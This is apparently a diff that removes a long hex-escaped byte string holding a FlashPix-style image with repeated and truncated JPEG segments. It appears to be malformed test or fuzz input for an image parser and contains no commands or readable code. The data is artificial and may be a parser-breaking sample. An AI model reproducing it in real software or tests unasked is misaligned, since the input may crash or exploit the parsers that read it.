-"\x09\x06\x4e\x4f\xef\x0f\x26\xae\x09\xc8\x00\x6d\xfd\x68\xfb\x22" -"\xff\x00\x7d\xff\x00\x3a\x3e\xca\xbf\xdf\x7f\xce\x80\x10\x4e\x41" -"\x27\x69\xe7\xde\xab\x5d\x9d\xd1\x39\xc7\x5a\xb5\xf6\x45\xfe\xfb" -"\xfe\x74\x8d\x66\x8c\xa4\x17\x7c\x1f\x7a\x00\xb3\x45\x14\x53\x00" -"\xa2\x8a\x28\x00\xa2\x8a\x28\x00\xa2\x8a\x28\x00\xff\xd9\x03\x11" -"\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5" -"\x5a\x6b\xae\xe4\x2b\xb8\xae\x7b\x8e\xa2\xa3\x92\x29\x1d\xb2\xb3" -"\x07\x08\x09\x0a\x0b\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05" -"\x04\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06" -"\x12\x41\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xa1\xb1" -"\xc1\x09\x23\x33\x52\xf0\x15\x62\x72\xd1\x0a\x16\x24\x34\xe1\x25" -"\xf1\x17\x18\x19\x1a\x26\x27\x28\x29\x2a\x35\x36\x37\x38\x39\x3a" -"\x43\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56\x57\x58\x59\x5a" -"\x63\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76\x77\x78\x79\x7a" -"\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98" -"\x99\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6" -"\xb7\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4" -"\xd5\xd6\xd7\xd8\xd9\xda\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf2" -"\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xff\xd9\x21\x31\x41\x00\x00\x00" -"\x32\x02\x00\x00\xff\xd8\xff\xdb\x00\x43\x00\x0c\x08\x09\x0a\x09" 
-"\x07\x0c\x0a\x09\x0a\x0d\x0c\x0c\x0e\x12\x1e\x13\x12\x10\x10\x12" -"\x25\x1a\x1c\x16\x1e\x2c\x26\x2e\x2d\x2b\x26\x2a\x29\x30\x36\x45" -"\x3b\x30\x33\x42\x34\x29\x2a\x3c\x52\x3d\x42\x48\x4a\x4e\x4f\x4e" -"\x2f\x3a\x55\x5b\x55\x4c\x5b\x45\x4c\x4e\x4b\xff\xdb\x00\x43\x01" -"\x0c\x0d\x0d\x12\x0f\x12\x23\x13\x13\x23\x4b\x32\x2a\x32\x4b\x4b" -"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b" -"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b" -"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b" -"\xff\xc4\x01\xa2\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00\x00" -"\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a" -"\x0b\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05\x05\x04\x04\x00\x00" -"\x01\x7d\x01\x02\x03\x00\x04\x11\x05\x12\x21\x31\x41\x06\x13\x51" -"\x61\x07\x22\x71\x14\x32\x81\x91\xa1\x08\x23\x42\xb1\xc1\x15\x52" -"\xd1\xf0\x24\x33\x62\x72\x82\x09\x0a\x16\x17\x18\x19\x1a\x25\x26" -"\x27\x28\x29\x2a\x34\x35\x36\x37\x38\x39\x3a\x43\x44\x45\x46\x47" -"\x48\x49\x4a\x53\x54\x55\x56\x57\x58\x59\x5a\x63\x64\x65\x66\x67" -"\x68\x69\x6a\x73\x74\x75\x76\x77\x78\x79\x7a\x83\x84\x85\x86\x87" -"\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99\x9a\xa2\xa3\xa4\xa5" -"\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xc2\xc3" -"\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda" -"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf1\xf2\xf3\xf4\xf5\xf6" -"\xf7\xf8\xf9\xfa\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01\x01" -"\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a" -"\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00" -"\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x29\x09\x03" -"\xa9\xa8\xde\x65\x53\x81\x92\x7d\x05\x00\x3a\x54\x57\x8c\x87\xce" -"\x3d\x8e\x2a\xa6\xeb\x4e\x7f\x79\x27\xfd\xf4\xd5\x2c\x8f\x29\xc0" -"\xfb\x99\xe8\xa3\x92\x6a\x3f\xb3\x20\x65\x12\x39\x25\xb3\x92\x1b" -"\xa5\x3b\x13\x71\xf0\x2d\xbc\x8f\xbe\x22\xc4\xaf\xa9\x3f\xd6\xad" 
-"\x55\x30\xb3\x5b\xf4\x7d\xe9\xea\xdc\xfe\x75\x2a\xcf\xd3\x78\xdb" -"\x9e\xfd\xa8\xb0\xee\x4f\x45\x34\x30\x3d\xe9\xd4\x86\x34\xae\x41" -"\xe7\x9f\x5a\x6c\x51\x08\x54\xfc\xc4\xe4\xe4\x93\x4d\x79\xf0\x48" -"\x51\xc8\xaa\xf2\xcc\x7f\x8d\xb1\xf5\xe0\x52\xb8\x58\x95\x9d\x23" -"\x94\xc9\xbc\xb6\x46\x31\xd8\x56\x45\xf2\xc9\x3d\xca\xcb\x1b\x3a" -"\xaf\xb1\xc5\x5c\x5f\xdf\x9c\xe7\xe4\x1e\x9d\xe9\xdb\x03\x48\xc0" -"\xaf\xcb\xb7\x18\xa5\x28\xc6\x6a\xd2\x1a\x6d\x6a\x84\x37\x8e\x81" -"\x02\x65\x81\x38\x23\x6f\x4a\xb5\x6c\x41\x0e\x0e\x70\x4f\xdd\x3d" -"\x05\x53\x54\x27\x23\x24\x3a\xf1\x93\xdc\x7b\xd3\x92\x5f\x9b\x61" -"\x20\x38\x38\xda\x4d\x37\xa0\x6e\x5f\x8e\x30\x8a\x57\x39\x19\xc8" -"\xcf\x6a\x78\x18\xaa\x27\x2d\x82\x4b\x02\x3a\x73\x4f\x8e\x57\x8c" -"\xe5\xe4\xca\x8e\xb9\x14\xc5\xa9\x05\xc7\x9c\x25\x72\x99\xc7\x34" -"\xc3\x68\x6e\xec\x40\x98\xba\x1f\xbd\x8e\xf5\x6f\x6e\xe9\x88\xf7" -"\xa9\x88\x1e\x5b\x7b\x8e\x05\x43\x82\x92\x6a\x45\x73\xb5\x6b\x19" -"\xf0\x5a\x8b\x2b\x60\x50\x96\x52\x72\xd9\xed\x53\x28\x19\x2c\x33" -"\xcf\xbd\x5a\x51\x98\x97\x23\x38\x18\x22\xaa\xb4\x0e\x24\xf2\x95" -"\xb0\xa4\xf0\x7b\x81\x4d\x41\x45\x5a\x22\xe6\x6d\xdd\x8d\x8d\x37" -"\xdc\x7c\x99\xe3\xef\x12\x78\x15\x5a\x4d\x32\x26\xd4\x0c\xdb\xe4" -"\xc1\x7c\x9e\x78\xcf\x5a\xd3\x54\x58\xa3\xda\xa3\xe5\x5f\xd6\x94" -"\x47\x9b\x72\x0f\xde\x3c\xe7\xde\x89\x53\x84\xfe\x25\x70\x53\x94" -"\x76\x65\x4b\xa8\xe4\x8d\x0b\xc6\x58\xfa\x01\xde\xa1\x1e\x77\x94" -"\xc6\x4c\xf2\xbe\xb5\xa4\xbf\x3a\x03\x8e\x48\xe4\x55\x7b\xa8\xf6" -"\xc4\xc4\x74\x20\xd0\xd0\xd4\x87\xed\x90\xc8\xc5\x07\x7f\x5a\x47" -"\x86\x49\x08\x2e\x80\x91\xef\x53\xc7\xd4\xd4\x95\x44\x95\x12\x19" -"\x23\x24\xa2\x05\xcf\x5e\x69\x76\x4d\xbb\x76\x06\x47\xbd\x5a\xa2" -"\x80\x2a\x3c\x32\x48\x00\x74\x0d\x8e\x99\x34\xa2\x39\x55\x36\x05" -"\x01\x7d\x33\x56\xa8\xa0\x0a\x91\xc3\x24\x79\xd8\x81\x73\xe8\x68" -"\x96\x29\xe4\x8c\xa9\x03\x91\xeb\x56\xe8\xa0\x00\xff\xd9\x05\xc9" -"\x27\x70\x42\x80\x76\xeb\x9a\xa8\xbb\x32\x64\xae\xac\x4b\x45\x14" 
-"\x54\x94\x00\xff\xd9\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08" -"\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x11\x00\x02\x01\x02\x04\x04" -"\x03\x04\x07\x05\x04\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04" -"\x05\x21\x31\x06\x12\x41\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14" -"\x42\x91\xa1\xb1\xc1\x09\x23\x33\x52\xf0\x15\x62\x72\xd1\x0a\x16" -"\x24\x34\xe1\x25\xf1\x17\x18\x19\x1a\x26\x27\x28\x29\x2a\x35\x36" -"\x37\x38\x39\x3a\x43\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56" -"\x57\x58\x59\x5a\x63\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76" -"\x77\x78\x79\x7a\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94" -"\x95\x96\x97\x98\x99\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2" -"\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9" -"\xca\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xe2\xe3\xe4\xe5\xe6\xe7" -"\xe8\xe9\xea\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xff\xd9\x21\x31" -"\x41\x00\x00\x00\x32\x02\x00\x00\xff\xd8\xff\xdb\x00\x43\x00\x0c" -"\x08\x09\x0a\x09\x07\x0c\x0a\x09\x0a\x0d\x0c\x0c\x0e\x12\x1e\x13" -"\x12\x10\x10\x12\x25\x1a\x1c\x16\x1e\x2c\x26\x2e\x2d\x2b\x26\x2a" -"\x29\x30\x36\x45\x3b\x30\x33\x42\x34\x29\x2a\x3c\x52\x3d\x42\x48" -"\x4a\x4e\x4f\x4e\x2f\x3a\x55\x5b\x55\x4c\x5b\x45\x4c\x4e\x4b\xff" -"\xdb\x00\x43\x01\x0c\x0d\x0d\x12\x0f\x12\x23\x13\x13\x23\x4b\x32" -"\x2a\x32\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b" -"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b" -"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b" -"\x4b\x4b\x4b\x4b\xff\xc4\x01\xa2\x00\x00\x01\x05\x01\x01\x01\x01" -"\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06" -"\x07\x08\x09\x0a\x0b\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05\x05" -"\x04\x04\x00\x00\x01\x7d\x01\x02\x03\x00\x04\x11\x05\x12\x21\x31" -"\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xa1\x08\x23\x42" -"\xb1\xc1\x15\x52\xd1\xf0\x24\x33\x62\x72\x82\x09\x0a\x16\x17\x18" -"\x19\x1a\x25\x26\x27\x28\x29\x2a\x34\x35\x36\x37\x38\x39\x3a\x43" 
-"\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56\x57\x58\x59\x5a\x63" -"\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76\x77\x78\x79\x7a\x83" -"\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99\x9a" -"\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7\xb8" -"\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5\xd6" -"\xd7\xd8\xd9\xda\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf1\xf2" -"\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\x01\x00\x03\x01\x01\x01\x01\x01" -"\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06" -"\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00" -"\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80" -"\x0a\x28\xa2\x80\x0a\xab\x75\x6d\x34\xcf\xba\x3b\x97\x88\x63\x1b" -"\x57\xbd\x5a\xa6\xc8\xdb\x10\xb6\x0b\x60\x74\x1d\xe8\x02\x99\xb3" -"\xba\x3f\xf2\xfc\xe3\xf0\x14\x7d\x92\xe8\x9f\xf8\xfe\x71\xc7\x65" -"\x1d\x7d\x69\x0e\xa5\xc9\x02\xda\x52\x41\xc6\x31\xd6\x94\x6a\x1b" -"\x90\xb0\xb6\x94\x10\xe1\x70\x46\x09\xfa\x50\x05\xea\x28\xa6\x97" -"\x50\x76\xe7\x9f\x41\x40\x0e\xa2\xa1\x96\x61\x1c\x65\xdc\xac\x68" -"\x07\x08\x09\x0a\x0b\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05" -"\x04\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06" -"\x12\x41\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xa1\xb1" -"\xc1\x09\x23\x33\x52\xf0\x15\x62\x72\xd1\x0a\x16\x24\x34\xe1\x25" -"\xf1\x17\x18\x19\x1a\x26\x27\x28\x29\x2a\x35\x36\x37\x38\x39\x3a" -"\x43\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56\x57\x58\x59\x5a" -"\x63\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76\x77\x78\x79\x7a" -"\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98" -"\x99\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6" -"\xb7\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4" -"\xd5\xd6\xd7\xd8\xd9\xda\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf2" -"\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xff\xd9\x01\x02\x13\x00\x00\x00" -"\x04\x00\x00\x00\x41\x00\x00\x00\x32\x02\x00\x00\xff\xd8\xff\xdb" 
-"\x00\x43\x00\x0c\x08\x09\x0a\x09\x07\x0c\x0a\x09\x0a\x0d\x0c\x0c" -"\x0e\x12\x1e\x13\x12\x10\x10\x12\x25\x1a\x1c\x16\x1e\x2c\x26\x2e" -"\x2d\x2b\x26\x2a\x29\x30\x36\x45\x3b\x30\x33\x42\x34\x29\x2a\x3c" -"\x52\x3d\x42\x48\x4a\x4e\x4f\x4e\x2f\x3a\x55\x5b\x55\x4c\x5b\x45" -"\x4c\x4e\x4b\xff\xdb\x00\x43\x01\x0c\x0d\x0d\x12\x0f\x12\x23\x13" -"\x13\x23\x4b\x32\x2a\x32\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b" -"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b" -"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b" -"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\xff\xc4\x01\xa2\x00\x00\x01\x05" -"\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02" -"\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x10\x00\x02\x01\x03\x03\x02" -"\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7d\x01\x02\x03\x00\x04\x11" -"\x05\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91" -"\xa1\x08\x23\x42\xb1\xc1\x15\x52\xd1\xf0\x24\x33\x62\x72\x82\x09" -"\x0a\x16\x17\x18\x19\x1a\x25\x26\x27\x28\x29\x2a\x34\x35\x36\x37" -"\x38\x39\x3a\x43\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56\x57" -"\x58\x59\x5a\x63\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76\x77" -"\x78\x79\x7a\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96" -"\x97\x98\x99\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4" -"\xb5\xb6\xb7\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2" -"\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8" -"\xe9\xea\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\x01\x00\x03\x01" -"\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x01\x02" -"\x00\x00\x00\x00\x13\x00\x00\x00\x01\x00\x00\x00\x13\x10\x00\x00" -"\x00\x00\x00\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80" -"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80" -"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80" -"\x48\x00\x00\x00\xed\x3f\x91\x1d\x10\xf8\xc7\x4c\xba\x77\x18\xb2" -"\x0a\xef\x0a\x49\x48\x00\x00\x00\x00\x6a\x61\x56\x54\xc1\xce\x11" 
-"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x13\x10\x00\x00\x01\x00\x00\x00" -"\x01\x00\x00\x00\x13\x10\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00" -"\x13\x00\x00\x00\x01\x00\x00\x00\x04\x10\x00\x00\x04\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xb5\xbf\x94\x3f\x00\x00\x80\x3f" -"\x04\x00\x00\x00\xb5\xbf\x94\x3f\x3b\x5f\xdc\xa2\x27\x52\xc1\xb6" -"\x00\x3e\xb9\xaa\xfe\x76\xa5\x79\xc4\x11\x0b\x38\x8f\xf1\xcd\xcb" -"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x6e\x61\x56\x54\xc1\xce\x11" -"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x6e\x61\x56" -"\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x30\x00\x00\x00" -"\x34\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x18\x00\x00\x00" -"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x00\x01\x00\x54\xc1\xce\x11" -"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x24\x00\x00\x00" -"\x80\x00\x00\x00\x6e\x00\x00\x00\x04\x00\x00\x00\x40\x00\x00\x00" -"\x40\x00\x00\x00\x03\x00\x00\x00\x24\x00\x00\x00\x10\x00\x00\x00" -"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x01\x01\x00\x54\xc1\xce\x11" -"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00" -"\x3f\x89\xce\x2a\x13\x24\xb3\x71\x14\x65\x81\xfe\x29\x06\x17\xf2" -"\xea\x69\xd8\x4d\x96\x5a\x45\x5e\xa6\xab\x9b\xc2\xe7\x6d\xbc\x66" -"\x43\xed\xd0\x7d\x4f\x4a\x55\xb3\x0d\x83\x70\xfe\x6e\x3f\x84\x0d" -"\xaa\x3f\x0a\x68\x63\x72\x36\x5b\xfc\x90\x77\x91\x7f\x8b\xd9\x7f" -"\x52\x00\x65\x00\x73\x00\x6f\x00\x6c\x00\x75\x00\x74\x00\x69\x00" -"\x6f\x00\x6e\x00\x20\x00\x30\x00\x30\x00\x30\x00\x31\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x20\x00\x01\x01\x13\x00\x00\x00\x0d\x00\x00\x00\x11\x00\x00\x00" -"\x00\x61\x61\x56\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b" -"\x00\x00\x00\x00\xe0\x40\xaf\x3b\x79\x7f\xc7\x01\xa0\x68\xb8\x3b" 
-"\x79\x7f\xc7\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00" -"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x48\x00\x65\x00" -"\x61\x00\x64\x00\x65\x00\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x2a\x00\x02\x01\x12\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x65\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00" -"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00" -"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x44\x00\x61\x00" -"\x74\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x26\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x66\x00\x00\x00\x9e\x08\x00\x00\x00\x00\x00\x00" -"\x52\x00\x65\x00\x73\x00\x6f\x00\x6c\x00\x75\x00\x74\x00\x69\x00" -"\x6f\x00\x6e\x00\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x20\x00\x01\x00\xff\xff\xff\xff\xff\xff\xff\xff\x14\x00\x00\x00" -"\x00\x61\x61\x56\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b" -"\x00\x00\x00\x00\x20\x4e\xb2\x3b\x79\x7f\xc7\x01\xa0\x68\xb8\x3b" -"\x79\x7f\xc7\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x01\x01\x00\x54\xc1\xce\x11" -"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00" 
-"\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00" -"\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80" -"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80" -"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80" -"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80" -"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x00\xff\xd9\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00" -"\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01" -"\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a" -"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a" -"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a" -"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a" -"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x00" -"\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8" -"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01" -"\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f" -"\x00\xf5\x5a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x6c\x8e\x91\xc6\xd2" -"\x48\xc1\x51\x41\x2c\xc4\xe0\x00\x3b\xd3\xab\x1b\xc4\xb0\x5c\xea" -"\x16\xb1\x69\x36\xdb\xe3\x5b\xc6\x2b\x3c\xe1\x72\x23\x88\x0c\xb7" -"\xe2\xdc\x2e\x3d\xcf\xa5\x00\x58\xd2\xb5\x9b\x4d\x4f\x4a\xfe\xd0" -"\x8d\x8c\x31\x29\x60\xe2\x5f\x94\xc7\x8f\xef\x67\xa7\x18\x3f\x42" -"\x2a\x27\xf1\x05\x8a\x6a\x0b\x01\x9e\x0f\x20\xc2\xf2\x9b\x9f\x34" -"\x6d\x05\x5d\x57\x6f\xd7\x2d\xeb\xda\xb1\x75\x2d\x33\x51\xb2\x83" -"\x54\x84\x3c\xda\x8c\x7a\x9d\xa4\x80\x94\x84\x29\x49\x55\x30\xa3" -"\x0b\xc7\xcc\xbc\x67\xd5\x40\xef\x56\xaf\x60\x4b\x3f\x11\x69\x97" -"\x4f\xa6\x4b\x2d\xad\xbd\x9b\xc7\xbe\x28\x77\x88\x18\xb2\xe0\xe0" -"\x73\xd0\x11\xc0\xc8\xfa\x50\x07\x4d\x45\x14\x50\x01\x45\x14\x50" 
-"\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50" -"\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50" -"\x01\x45\x14\x50\x01\x59\x7a\xd6\xa7\x3e\x9e\xf6\x51\x5a\xda\x8b" -"\x99\xaf\x26\xf2\x54\x33\xec\x0a\x76\x96\xc9\x38\x3c\x0c\x73\x5a" -"\x95\x9f\xa8\xd8\xc9\x77\x7f\xa6\xdc\x23\xaa\xad\xa4\xed\x2b\x83" -"\xd4\x83\x1b\x2f\x1f\x8b\x0a\x00\xff\xd9\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00" -"\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03" -"\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\xe8\xae\xed\x67\xb5\xfb" -"\x54\x37\x11\x49\x06\x09\xf3\x55\xc1\x5c\x0e\xbc\xf4\xa8\xe0\xd4" -"\xf4\xfb\x88\x64\x9a\x0b\xeb\x69\x62\x8b\x99\x1d\x25\x52\x13\xea" 